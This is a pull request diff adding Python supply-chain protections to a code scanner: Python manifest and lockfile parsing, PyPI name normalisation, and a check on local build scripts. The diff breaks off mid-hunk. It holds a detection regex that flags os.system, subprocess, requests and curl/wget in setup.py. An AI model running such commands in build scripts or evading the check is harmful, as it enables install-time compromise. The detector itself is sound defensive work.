### PR TITLE
feat(guard): add python supply-chain protections

### DIFF
--- a/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
@@ -552,6 +552,9 @@ def _redacted_command_text(command_text: str) -> str:
 
 def _strip_redaction_wrappers(segment: list[str]) -> list[str]:
     while segment:
+        if _ENV_ASSIGNMENT_RE.match(segment[0]):
+            segment.pop(0)
+            continue
         command_name = _command_name(segment[0])
         if command_name == "sudo":
             segment = _strip_sudo_prefix(segment[1:])

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
@@ -4,6 +4,7 @@ from __future__ import annotations
 
 import re
 import shlex
+from dataclasses import replace
 from pathlib import Path
 
 from ..protect import _collect_package_specs
@@ -62,7 +63,10 @@ def parse_package_intent(command_text: str, *, workspace: Path | None = None) ->
     handler = handlers.get(command_name)
     if handler is None:
         return None
-    return handler(command_tokens, workspace=workspace)
+    intent = handler(command_tokens, workspace=workspace)
+    if intent is None:
+        return None
+    return replace(intent, redacted_command=_redacted_command_text(command_text))
 
 
 def extract_package_intent_request(
@@ -528,6 +532,38 @@ def _normalized_command_tokens(command_text: str) -> tuple[str, ...]:
     if len(segment) >= 3 and _command_name(segment[0]) in _PYTHON_EXECUTABLES and segment[1] == "-m":
         segment = [segment[2], *segment[3:]]
     return tuple(segment)
+
+
+def _redacted_command_text(command_text: str) -> str:
+    try:
+        tokens = shlex.split(command_text, posix=True)
+    except ValueError:
+        return ""
+    segment: list[str] = []
+    for token in tokens:
+        if token in _CONTROL_TOKENS:
+            break
+        segment.append(token)
+    segment = _strip_redaction_wrappers(segment)
+    if len(segment) >= 3 and _command_name(segment[0]) in _PYTHON_EXECUTABLES and segment[1] == "-m":
+        segment = [segment[2], *segment[3:]]
+    return redacted_command(tuple(segment))
+
+
+def _strip_redaction_wrappers(segment: list[str]) -> list[str]:
+    while segment:
+        command_name = _command_name(segment[0])
+        if command_name == "sudo":
+            segment = _strip_sudo_prefix(segment[1:])
+            continue
+        if command_name == "env":
+            segment = _strip_env_prefix(segment[1:])
+            continue
+        if command_name in {"command", "time"}:
+            segment = _strip_plain_wrapper_flags(segment[1:])
+            continue
+        break
+    return segment
 
 
 def _strip_wrapper_tokens(segment: list[str]) -> list[str]:

--- a/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
@@ -58,8 +58,25 @@ def parse_manifest_dependency_changes(
     return ManifestParseResult(changes)
 
 
+def parse_manifest_dependencies(
+    *,
+    path: str,
+    text: str,
+    byte_limit: int = 2_097_152,
+    deadline_ms: int = 50,
+) -> dict[str, str]:
+    if len(text.encode("utf-8")) > byte_limit:
+        return {}
+    deadline = time.monotonic() + (deadline_ms / 1000)
+    try:
+        return _dependency_map_for_path(path, text, deadline=deadline)
+    except Exception:
+        return {}
+
+
 def _dependency_map_for_path(path: str, text: str, *, deadline: float) -> dict[str, str]:
     lower_path = path.lower()
+    lower_name = lower_path.rsplit("/", 1)[-1]
     if lower_path.endswith("package.json"):
         return _json_dependency_map(
             text,
@@ -76,10 +93,20 @@ def _dependency_map_for_path(path: str, text: str, *, deadline: float) -> dict[s
         return _bun_lock_dependency_map(text, deadline)
     if lower_path.endswith("composer.json"):
         return _json_dependency_map(text, ("require", "require-dev"), deadline)
-    if lower_path.endswith("requirements.txt"):
+    if lower_path.endswith("requirements.txt") or lower_path.endswith("constraints.txt") or lower_name.endswith(
+        ".requirements.txt"
+    ):
         return _requirements_dependency_map(text, deadline)
     if lower_path.endswith("pyproject.toml"):
         return _pyproject_dependency_map(text, deadline)
+    if lower_path.endswith("poetry.lock"):
+        return _poetry_lock_dependency_map(text, deadline)
+    if lower_path.endswith("uv.lock"):
+        return _uv_lock_dependency_map(text, deadline)
+    if lower_path.endswith("pipfile"):
+        return _toml_table_dependency_map(text, ("packages", "dev-packages"), deadline)
+    if lower_path.endswith("pipfile.lock"):
+        return _pipfile_lock_dependency_map(text, deadline)
     if lower_path.endswith("cargo.toml"):
         return _toml_table_dependency_map(text, ("dependencies", "dev-dependencies", "build-dependencies"), deadline)
     if lower_path.endswith("go.mod"):
@@ -281,7 +308,11 @@ def _requirements_dependency_map(text: str, deadline: float) -> dict[str, str]:
     for line in text.splitlines():
         _ensure_within_deadline(deadline)
         stripped = line.strip()
-        if not stripped or stripped.startswith("#") or stripped.startswith("-"):
+        if not stripped or stripped.startswith("#"):
+            continue
+        stripped = re.split(r"\s+#", stripped, maxsplit=1)[0].strip()
+        stripped = re.sub(r"\s+--hash(?:=|\s+)[^\s]+", "", stripped).strip()
+        if not stripped or stripped.startswith("-"):
             continue
         target: PackageIntentTarget = python_target(stripped)
         if target.package_name is not None:
@@ -295,12 +326,110 @@ def _pyproject_dependency_map(text: str, deadline: float) -> dict[str, str]:
     dependencies: dict[str, str] = {}
     project = payload.get("project")
     if isinstance(project, dict):
-        values = project.get("dependencies")
-        if isinstance(values, list):
-            for value in values:
-                target = python_target(str(value))
-                if target.package_name is not None:
-                    dependencies[target.package_name] = target.requested_specifier or ""
+        _collect_python_dependency_list(dependencies, project.get("dependencies"), deadline)
+        optional_dependencies = project.get("optional-dependencies")
+        if isinstance(optional_dependencies, dict):
+            for values in optional_dependencies.values():
+                _collect_python_dependency_list(dependencies, values, deadline)
+    tool = payload.get("tool")
+    if isinstance(tool, dict):
+        poetry = tool.get("poetry")
+        if isinstance(poetry, dict):
+            _collect_poetry_dependency_table(dependencies, poetry.get("dependencies"), deadline)
+            _collect_poetry_dependency_table(dependencies, poetry.get("dev-dependencies"), deadline)
+            groups = poetry.get("group")
+            if isinstance(groups, dict):
+                for group in groups.values():
+                    if not isinstance(group, dict):
+                        continue
+                    _collect_poetry_dependency_table(dependencies, group.get("dependencies"), deadline)
+    return dependencies
+
+
+def _collect_python_dependency_list(
+    dependencies: dict[str, str],
+    values: object,
+    deadline: float,
+) -> None:
+    if not isinstance(values, list):
+        return
+    for value in values:
+        _ensure_within_deadline(deadline)
+        target = python_target(str(value))
+        if target.package_name is not None:
+            dependencies[target.package_name] = target.requested_specifier or ""
+
+
+def _collect_poetry_dependency_table(
+    dependencies: dict[str, str],
+    values: object,
+    deadline: float,
+) -> None:
+    if not isinstance(values, dict):
+        return
+    for package_name, value in values.items():
+        _ensure_within_deadline(deadline)
+        normalized_name = str(package_name)
+        if normalized_name == "python":
+            continue
+        if isinstance(value, str):
+            dependencies[normalized_name] = value
+            continue
+        if isinstance(value, dict) and isinstance(value.get("version"), str):
+            dependencies[normalized_name] = str(value["version"])
+
+
+def _poetry_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
+    _ensure_within_deadline(deadline)
+    payload = tomllib.loads(text or "")
+    packages = payload.get("package")
+    dependencies: dict[str, str] = {}
+    if not isinstance(packages, list):
+        return dependencies
+    for package in packages:
+        _ensure_within_deadline(deadline)
+        if not isinstance(package, dict):
+            continue
+        name = package.get("name")
+        version = package.get("version")
+        if isinstance(name, str) and isinstance(version, str):
+            dependencies[name] = version
+    return dependencies
+
+
+def _uv_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
+    _ensure_within_deadline(deadline)
+    payload = tomllib.loads(text or "")
+    packages = payload.get("package")
+    dependencies: dict[str, str] = {}
+    if not isinstance(packages, list):
+        return dependencies
+    for package in packages:
+        _ensure_within_deadline(deadline)
+        if not isinstance(package, dict):
+            continue
+        name = package.get("name")
+        version = package.get("version")
+        if isinstance(name, str) and isinstance(version, str):
+            dependencies[name] = version
+    return dependencies
+
+
+def _pipfile_lock_dependency_map(text: str, deadline: float) -> dict[str, str]:
+    _ensure_within_deadline(deadline)
+    payload = json.loads(text or "{}")
+    dependencies: dict[str, str] = {}
+    for section in ("default", "develop"):
+        values = payload.get(section)
+        if not isinstance(values, dict):
+            continue
+        for package_name, package_value in values.items():
+            _ensure_within_deadline(deadline)
+            if not isinstance(package_name, str) or not isinstance(package_value, dict):
+                continue
+            exact_version = _exact_dependency_version(package_value.get("version"))
+            if exact_version is not None:
+                dependencies[package_name] = exact_version
     return dependencies
 
 

--- a/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
@@ -307,8 +307,7 @@ def _exact_dependency_version(value: object) -> str | None:
 
 def _requirements_dependency_map(text: str, deadline: float) -> dict[str, str]:
     dependencies: dict[str, str] = {}
-    for line in text.splitlines():
-        _ensure_within_deadline(deadline)
+    for line in _requirements_logical_lines(text, deadline):
         stripped = line.strip()
         if not stripped or stripped.startswith("#"):
             continue
@@ -320,6 +319,24 @@ def _requirements_dependency_map(text: str, deadline: float) -> dict[str, str]:
         if target.package_name is not None:
             dependencies[target.package_name] = target.requested_specifier or ""
     return dependencies
+
+
+def _requirements_logical_lines(text: str, deadline: float) -> list[str]:
+    logical_lines: list[str] = []
+    current = ""
+    for line in text.splitlines():
+        _ensure_within_deadline(deadline)
+        fragment = line.rstrip()
+        if current:
+            fragment = f"{current} {fragment.lstrip()}"
+        if fragment.endswith("\\"):
+            current = fragment[:-1].rstrip()
+            continue
+        logical_lines.append(fragment)
+        current = ""
+    if current:
+        logical_lines.append(current)
+    return logical_lines
 
 
 def _pyproject_dependency_map(text: str, deadline: float) -> dict[str, str]:

--- a/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manifest_diff.py
@@ -93,8 +93,10 @@ def _dependency_map_for_path(path: str, text: str, *, deadline: float) -> dict[s
         return _bun_lock_dependency_map(text, deadline)
     if lower_path.endswith("composer.json"):
         return _json_dependency_map(text, ("require", "require-dev"), deadline)
-    if lower_path.endswith("requirements.txt") or lower_path.endswith("constraints.txt") or lower_name.endswith(
-        ".requirements.txt"
+    if (
+        lower_path.endswith("requirements.txt")
+        or lower_path.endswith("constraints.txt")
+        or lower_name.endswith(".requirements.txt")
     ):
         return _requirements_dependency_map(text, deadline)
     if lower_path.endswith("pyproject.toml"):

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
@@ -5,6 +5,7 @@ from __future__ import annotations
 import base64
 import hashlib
 import json
+import re
 import time
 from dataclasses import dataclass
 
@@ -187,14 +188,26 @@ def verify_supply_chain_bundle_response(
 
 
 def _package_matches(package: SupplyChainBundlePackage, package_name: str, package_version: str | None) -> bool:
-    normalized_name = package_name.strip().lower()
-    namespace_name = f"{package.namespace.lower()}/{package.name.lower()}" if package.namespace is not None else None
+    normalized_name = _normalize_package_name(package.ecosystem, package_name)
+    namespace_name = (
+        _normalize_package_name(package.ecosystem, f"{package.namespace}/{package.name}")
+        if package.namespace is not None
+        else None
+    )
+    package_leaf_name = _normalize_package_name(package.ecosystem, package.name)
     if normalized_name.startswith("@"):
         if namespace_name != normalized_name:
             return False
-    elif package.namespace is not None or package.name.lower() != normalized_name:
+    elif package.namespace is not None or package_leaf_name != normalized_name:
         return False
     return package_version is None or package.version == package_version
+
+
+def _normalize_package_name(ecosystem: str, package_name: str) -> str:
+    normalized = package_name.strip().lower()
+    if ecosystem == "pypi":
+        return re.sub(r"[-_.]+", "-", normalized)
+    return normalized
 
 
 def _is_high_confidence_block(package: SupplyChainBundlePackage) -> bool:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
@@ -223,6 +223,7 @@ def evaluate_cached_supply_chain_bundle(
     *,
     package_name: str,
     package_version: str | None = None,
+    ecosystem: str | None = None,
     now: float | None = None,
 ) -> OfflineSupplyChainDecision:
     """Evaluate one package against the cached supply-chain bundle."""
@@ -232,7 +233,11 @@ def evaluate_cached_supply_chain_bundle(
         check_supply_chain_bundle_freshness(response.bundle, now=now)
     except SupplyChainBundleExpiredError:
         stale = True
-    matches = [item for item in response.bundle.packages if _package_matches(item, package_name, package_version)]
+    matches = [
+        item
+        for item in response.bundle.packages
+        if (ecosystem is None or item.ecosystem == ecosystem) and _package_matches(item, package_name, package_version)
+    ]
     if not matches:
         return OfflineSupplyChainDecision(
             action="monitor",

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -608,6 +608,7 @@ def _evaluate_with_bundle(
             bundle_response,
             package_name=str(target["normalized_name"]),
             package_version=resolved_version,
+            ecosystem=_optional_string(target.get("ecosystem")) or "npm",
         )
         if package_match is None:
             safe_allow = _recommended_fix_allow_package_result(
@@ -2005,6 +2006,9 @@ def _bundle_package_versions(bundle_response: SupplyChainBundleResponse, target:
 
 
 def _bundle_package_name_matches(package: SupplyChainBundlePackage, target: dict[str, object]) -> bool:
+    target_ecosystem = _optional_string(target.get("ecosystem"))
+    if target_ecosystem is not None and package.ecosystem != target_ecosystem:
+        return False
     full_name = (
         _normalize_package_name(package.ecosystem, f"{package.namespace}/{package.name}")
         if package.namespace is not None

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1484,7 +1484,11 @@ def _lockfile_dependency_versions(
     if not isinstance(lockfile_paths, list):
         return {}
     versions: dict[tuple[str, str | None], str] = {}
-    python_manifest_names = _manifest_direct_dependency_names(workspace_dir, artifact, ecosystem="pypi")
+    python_manifest_names = _manifest_direct_dependency_names(
+        workspace_dir,
+        artifact,
+        ecosystem="pypi",
+    )
     for relative_path in lockfile_paths:
         lockfile_path = workspace_dir / str(relative_path)
         if not lockfile_path.exists():
@@ -1826,7 +1830,10 @@ def _poetry_lock_target_versions(
     targets: tuple[dict[str, object], ...],
     direct_manifest_names: set[str],
 ) -> dict[tuple[str, str | None], str]:
-    return _target_versions_from_direct_map(targets, _poetry_lock_direct_versions(text, direct_manifest_names))
+    return _target_versions_from_direct_map(
+        targets,
+        _poetry_lock_direct_versions(text, direct_manifest_names),
+    )
 
 
 def _poetry_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict[str, str]:
@@ -1844,7 +1851,11 @@ def _poetry_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> 
         name = _optional_string(package.get("name"))
         version = _optional_string(package.get("version"))
         normalized_name = _normalize_package_name("pypi", name) if name is not None else None
-        if normalized_name is None or version is None or normalized_name not in direct_manifest_names:
+        if (
+            normalized_name is None
+            or version is None
+            or normalized_name not in direct_manifest_names
+        ):
             continue
         direct_versions[normalized_name] = version
     return direct_versions
@@ -1855,7 +1866,10 @@ def _uv_lock_target_versions(
     targets: tuple[dict[str, object], ...],
     direct_manifest_names: set[str],
 ) -> dict[tuple[str, str | None], str]:
-    return _target_versions_from_direct_map(targets, _uv_lock_direct_versions(text, direct_manifest_names))
+    return _target_versions_from_direct_map(
+        targets,
+        _uv_lock_direct_versions(text, direct_manifest_names),
+    )
 
 
 def _uv_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict[str, str]:
@@ -1873,7 +1887,11 @@ def _uv_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict
         name = _optional_string(package.get("name"))
         version = _optional_string(package.get("version"))
         normalized_name = _normalize_package_name("pypi", name) if name is not None else None
-        if normalized_name is None or version is None or normalized_name not in direct_manifest_names:
+        if (
+            normalized_name is None
+            or version is None
+            or normalized_name not in direct_manifest_names
+        ):
             continue
         direct_versions[normalized_name] = version
     return direct_versions
@@ -1884,7 +1902,10 @@ def _pipfile_lock_target_versions(
     targets: tuple[dict[str, object], ...],
     direct_manifest_names: set[str],
 ) -> dict[tuple[str, str | None], str]:
-    return _target_versions_from_direct_map(targets, _pipfile_lock_direct_versions(text, direct_manifest_names))
+    return _target_versions_from_direct_map(
+        targets,
+        _pipfile_lock_direct_versions(text, direct_manifest_names),
+    )
 
 
 def _pipfile_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict[str, str]:
@@ -2142,7 +2163,10 @@ def _bundle_package(
     ecosystem: str | None = None,
 ) -> SupplyChainBundlePackage | None:
     for item in bundle_response.bundle.packages:
-        normalized = _normalize_package_name(ecosystem or item.ecosystem, package_name)
+        normalized = _normalize_package_name(
+            ecosystem or item.ecosystem,
+            package_name,
+        )
         full_name = (
             _normalize_package_name(item.ecosystem, f"{item.namespace}/{item.name}")
             if item.namespace is not None

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1307,6 +1307,8 @@ def _looks_like_explicit_local_python_path(raw_spec: str) -> bool:
         normalized == "."
         or normalized == "~"
         or normalized.startswith(("./", "../", "/", "~/", ".\\", "..\\", "~\\", "\\\\", "//"))
+        or "/" in normalized
+        or "\\" in normalized
         or bool(re.match(r"^[A-Za-z]:[\\\\/]", normalized))
     )
 

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -2428,8 +2428,12 @@ def _python_lockfile_version(value: object) -> str | None:
     if not isinstance(value, str):
         return None
     normalized = value.strip().strip('"').strip("'")
+    if ";" in normalized:
+        normalized = normalized.split(";", 1)[0].strip()
     if normalized.startswith(("==", "===")):
         normalized = normalized.lstrip("=")
+    if not normalized:
+        return None
     try:
         Version(normalized)
     except InvalidVersion:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1300,6 +1300,13 @@ def _local_python_build_result(target: dict[str, object], workspace_dir: Path | 
     return None
 
 
+def _looks_like_explicit_local_python_path(raw_spec: str) -> bool:
+    normalized = raw_spec.strip()
+    return normalized == "." or normalized == "~" or normalized.startswith(
+        ("./", "../", "/", "~/", ".\\", "..\\", "~\\", "\\\\", "//")
+    ) or bool(re.match(r"^[A-Za-z]:[\\\\/]", normalized))
+
+
 def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -> Path | None:
     raw_spec = _optional_string(target.get("raw_spec"))
     source_url = _optional_string(target.get("source_url"))
@@ -1310,6 +1317,11 @@ def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -
         return workspace_dir if editable else None
     if raw_spec.startswith(("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:")):
         return None
+    if not _looks_like_explicit_local_python_path(raw_spec):
+        workspace_has_python_project = (workspace_dir / "pyproject.toml").exists() or (
+            workspace_dir / "setup.py"
+        ).exists()
+        return workspace_dir if editable and workspace_has_python_project else None
     candidate_path = Path(raw_spec.partition("file:")[2] if raw_spec.startswith("file:") else raw_spec)
     disk_path = candidate_path if candidate_path.is_absolute() else workspace_dir / candidate_path
     if disk_path.is_dir():
@@ -2162,18 +2174,18 @@ def _bundle_package(
     package_version: str,
     ecosystem: str | None = None,
 ) -> SupplyChainBundlePackage | None:
+    normalized = _normalize_package_name(ecosystem, package_name) if ecosystem is not None else None
     for item in bundle_response.bundle.packages:
-        normalized = _normalize_package_name(
-            ecosystem or item.ecosystem,
-            package_name,
-        )
+        if ecosystem is not None and item.ecosystem != ecosystem:
+            continue
+        target_name = normalized or _normalize_package_name(item.ecosystem, package_name)
         full_name = (
             _normalize_package_name(item.ecosystem, f"{item.namespace}/{item.name}")
             if item.namespace is not None
             else _normalize_package_name(item.ecosystem, item.name)
         )
         normalized_item_name = _normalize_package_name(item.ecosystem, item.name)
-        if normalized not in {normalized_item_name, full_name}:
+        if target_name not in {normalized_item_name, full_name}:
             continue
         if item.version == package_version:
             return item

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -1302,9 +1302,12 @@ def _local_python_build_result(target: dict[str, object], workspace_dir: Path | 
 
 def _looks_like_explicit_local_python_path(raw_spec: str) -> bool:
     normalized = raw_spec.strip()
-    return normalized == "." or normalized == "~" or normalized.startswith(
-        ("./", "../", "/", "~/", ".\\", "..\\", "~\\", "\\\\", "//")
-    ) or bool(re.match(r"^[A-Za-z]:[\\\\/]", normalized))
+    return (
+        normalized == "."
+        or normalized == "~"
+        or normalized.startswith(("./", "../", "/", "~/", ".\\", "..\\", "~\\", "\\\\", "//"))
+        or bool(re.match(r"^[A-Za-z]:[\\\\/]", normalized))
+    )
 
 
 def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -> Path | None:
@@ -1331,9 +1334,7 @@ def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -
     parent = disk_path.parent
     if disk_path.name in {"pyproject.toml", "setup.py"} and disk_path.exists():
         return parent
-    workspace_has_python_project = (workspace_dir / "pyproject.toml").exists() or (
-        workspace_dir / "setup.py"
-    ).exists()
+    workspace_has_python_project = (workspace_dir / "pyproject.toml").exists() or (workspace_dir / "setup.py").exists()
     return workspace_dir if editable and workspace_has_python_project else None
 
 
@@ -1863,11 +1864,7 @@ def _poetry_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> 
         name = _optional_string(package.get("name"))
         version = _optional_string(package.get("version"))
         normalized_name = _normalize_package_name("pypi", name) if name is not None else None
-        if (
-            normalized_name is None
-            or version is None
-            or normalized_name not in direct_manifest_names
-        ):
+        if normalized_name is None or version is None or normalized_name not in direct_manifest_names:
             continue
         direct_versions[normalized_name] = version
     return direct_versions
@@ -1899,11 +1896,7 @@ def _uv_lock_direct_versions(text: str, direct_manifest_names: set[str]) -> dict
         name = _optional_string(package.get("name"))
         version = _optional_string(package.get("version"))
         normalized_name = _normalize_package_name("pypi", name) if name is not None else None
-        if (
-            normalized_name is None
-            or version is None
-            or normalized_name not in direct_manifest_names
-        ):
+        if normalized_name is None or version is None or normalized_name not in direct_manifest_names:
             continue
         direct_versions[normalized_name] = version
     return direct_versions

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -26,7 +26,11 @@ from ..models import GuardArtifact
 from ..store import GuardStore
 from ..store_evidence import EvidenceRecord
 from .js_semver import version_matches_js_selector
-from .package_manifest_diff import _DeadlineExceededError, _dependency_map_for_path
+from .package_manifest_diff import (
+    _DeadlineExceededError,
+    _dependency_map_for_path,
+    parse_manifest_dependencies,
+)
 from .runner import (
     _guard_sync_headers,
     _normalized_receipts_sync_url,
@@ -616,6 +620,7 @@ def _evaluate_with_bundle(
         refresh_required = refresh_required or offline.stale
         package = _bundle_package_result(
             target=target,
+            bundle_response=bundle_response,
             package=package_match,
             decision=_normalize_bundle_action(offline.action),
             reason=offline.reason,
@@ -668,6 +673,24 @@ def _evaluate_with_bundle(
     )
 
 
+def _primary_bundle_advisory_id(
+    bundle_response: SupplyChainBundleResponse,
+    package: SupplyChainBundlePackage,
+) -> str | None:
+    if not package.related_advisory_ids:
+        return None
+    advisory_lookup: dict[str, str] = {}
+    for advisory in bundle_response.bundle.advisories:
+        advisory_lookup[advisory.advisory_id] = advisory.advisory_id
+        for alias in advisory.aliases:
+            advisory_lookup.setdefault(alias, advisory.advisory_id)
+    for advisory_id in package.related_advisory_ids:
+        canonical_id = advisory_lookup.get(advisory_id)
+        if canonical_id is not None:
+            return canonical_id
+    return package.related_advisory_ids[0]
+
+
 def _heuristic_result(
     *,
     artifact: GuardArtifact,
@@ -683,6 +706,10 @@ def _heuristic_result(
         )
         if local_package_result is not None:
             packages.append(local_package_result)
+            continue
+        local_python_result = _local_python_build_result(target=target, workspace_dir=workspace_dir)
+        if local_python_result is not None:
+            packages.append(local_python_result)
             continue
         source_url = _optional_string(target.get("source_url"))
         if source_url is not None and source_url.lower().startswith("http://"):
@@ -783,6 +810,7 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
     for item in raw_targets:
         if not isinstance(item, dict):
             continue
+        ecosystem = str(item.get("ecosystem") or "npm")
         package_name = _optional_string(item.get("package_name"))
         if package_name is None:
             continue
@@ -797,9 +825,9 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
             source_url = _source_url_from_raw_spec(raw_spec)
         parsed.append(
             {
-                "ecosystem": str(item.get("ecosystem") or "npm"),
+                "ecosystem": ecosystem,
                 "package_name": package_name,
-                "normalized_name": package_name.lower(),
+                "normalized_name": _normalize_package_name(ecosystem, package_name),
                 "namespace": namespace,
                 "name": name,
                 "raw_spec": raw_spec,
@@ -807,6 +835,9 @@ def _targets_from_artifact(artifact: GuardArtifact) -> tuple[dict[str, object], 
                 "range": requested if exact_version is None else None,
                 "source_url": source_url,
                 "alias": _optional_string(item.get("alias")),
+                "dependency_group": _optional_string(item.get("dependency_group")),
+                "extras": tuple(item.get("extras")) if isinstance(item.get("extras"), list) else (),
+                "editable": bool(item.get("editable")),
                 "package_manager": package_manager,
             }
         )
@@ -917,7 +948,7 @@ def _transitive_lockfile_results(
     direct_target_names: set[str] = set()
     for target in _targets_from_artifact(artifact):
         direct_target_names.add(str(target["normalized_name"]))
-        direct_target_names.update(_package_lock_candidate_names(target))
+        direct_target_names.update(_target_candidate_names(target))
     for relative_path in lockfile_paths:
         lockfile_path = workspace_dir / str(relative_path)
         if not lockfile_path.exists():
@@ -998,6 +1029,7 @@ def _transitive_lockfile_results(
 def _bundle_package_result(
     *,
     target: dict[str, object],
+    bundle_response: SupplyChainBundleResponse,
     package: SupplyChainBundlePackage,
     decision: str,
     reason: str,
@@ -1019,7 +1051,7 @@ def _bundle_package_result(
         "alias": _optional_string(target.get("alias")),
         "reasons": (
             {
-                "advisoryId": package.related_advisory_ids[0] if package.related_advisory_ids else None,
+                "advisoryId": _primary_bundle_advisory_id(bundle_response, package),
                 "code": reason,
                 "message": _bundle_reason_message(package, decision=decision, reason=reason, stale=stale),
                 "severity": severity,
@@ -1222,6 +1254,86 @@ def _local_package_manifest_path(target: dict[str, object], workspace_dir: Path 
     return None
 
 
+def _local_python_build_result(target: dict[str, object], workspace_dir: Path | None) -> dict[str, object] | None:
+    if workspace_dir is None or (_optional_string(target.get("ecosystem")) or "npm") != "pypi":
+        return None
+    project_path = _local_python_project_path(target, workspace_dir)
+    if project_path is None:
+        return None
+    setup_py_path = project_path / "setup.py"
+    if setup_py_path.exists():
+        try:
+            setup_py_text = setup_py_path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            setup_py_text = ""
+        if _python_setup_script_looks_suspicious(setup_py_text):
+            return _heuristic_package_result(
+                target=target,
+                decision="block",
+                code="setup_py_exec_risk",
+                message="Local setup.py executes commands or network behavior during packaging.",
+                severity="high",
+            )
+    pyproject_path = project_path / "pyproject.toml"
+    if pyproject_path.exists():
+        try:
+            pyproject_text = pyproject_path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            pyproject_text = ""
+        if "[build-system]" in pyproject_text and "build-backend" in pyproject_text:
+            if _python_setup_script_looks_suspicious(pyproject_text):
+                return _heuristic_package_result(
+                    target=target,
+                    decision="block",
+                    code="build_backend_exec_risk",
+                    message="Local pyproject build backend references execution or network bootstrap behavior.",
+                    severity="high",
+                )
+            return _heuristic_package_result(
+                target=target,
+                decision="warn",
+                code="local_build_backend_risk",
+                message="Editable local Python installs can invoke pyproject build backend hooks from this workspace.",
+                severity="medium",
+            )
+    return None
+
+
+def _local_python_project_path(target: dict[str, object], workspace_dir: Path) -> Path | None:
+    raw_spec = _optional_string(target.get("raw_spec"))
+    source_url = _optional_string(target.get("source_url"))
+    editable = bool(target.get("editable"))
+    if source_url is not None and source_url.startswith("file:"):
+        raw_spec = source_url.partition("file:")[2]
+    if raw_spec is None:
+        return workspace_dir if editable else None
+    if raw_spec.startswith(("http://", "https://", "git+", "github:", "gitlab:", "bitbucket:")):
+        return None
+    candidate_path = Path(raw_spec.partition("file:")[2] if raw_spec.startswith("file:") else raw_spec)
+    disk_path = candidate_path if candidate_path.is_absolute() else workspace_dir / candidate_path
+    if disk_path.is_dir():
+        if (disk_path / "pyproject.toml").exists() or (disk_path / "setup.py").exists():
+            return disk_path
+        return None
+    parent = disk_path.parent
+    if disk_path.name in {"pyproject.toml", "setup.py"} and disk_path.exists():
+        return parent
+    workspace_has_python_project = (workspace_dir / "pyproject.toml").exists() or (
+        workspace_dir / "setup.py"
+    ).exists()
+    return workspace_dir if editable and workspace_has_python_project else None
+
+
+def _python_setup_script_looks_suspicious(content: str) -> bool:
+    return bool(
+        re.search(
+            r"\b(?:os\.system|subprocess\.(?:run|Popen|call|check_output)|requests\.(?:get|post)|urllib\.request\.)",
+            content,
+        )
+        or re.search(r"\b(?:curl|wget)\b", content)
+    )
+
+
 def _manifest_package_name(manifest_text: str) -> str | None:
     try:
         payload = json.loads(manifest_text or "{}")
@@ -1371,6 +1483,7 @@ def _lockfile_dependency_versions(
     if not isinstance(lockfile_paths, list):
         return {}
     versions: dict[tuple[str, str | None], str] = {}
+    python_manifest_names = _manifest_direct_dependency_names(workspace_dir, artifact, ecosystem="pypi")
     for relative_path in lockfile_paths:
         lockfile_path = workspace_dir / str(relative_path)
         if not lockfile_path.exists():
@@ -1390,6 +1503,81 @@ def _lockfile_dependency_versions(
             continue
         if lockfile_path.name == "bun.lock":
             versions.update(_bun_lock_target_versions(lockfile_text, targets))
+            continue
+        if lockfile_path.name == "poetry.lock":
+            versions.update(_poetry_lock_target_versions(lockfile_text, targets, python_manifest_names))
+            continue
+        if lockfile_path.name == "uv.lock":
+            versions.update(_uv_lock_target_versions(lockfile_text, targets, python_manifest_names))
+            continue
+        if lockfile_path.name == "Pipfile.lock":
+            versions.update(_pipfile_lock_target_versions(lockfile_text, targets, python_manifest_names))
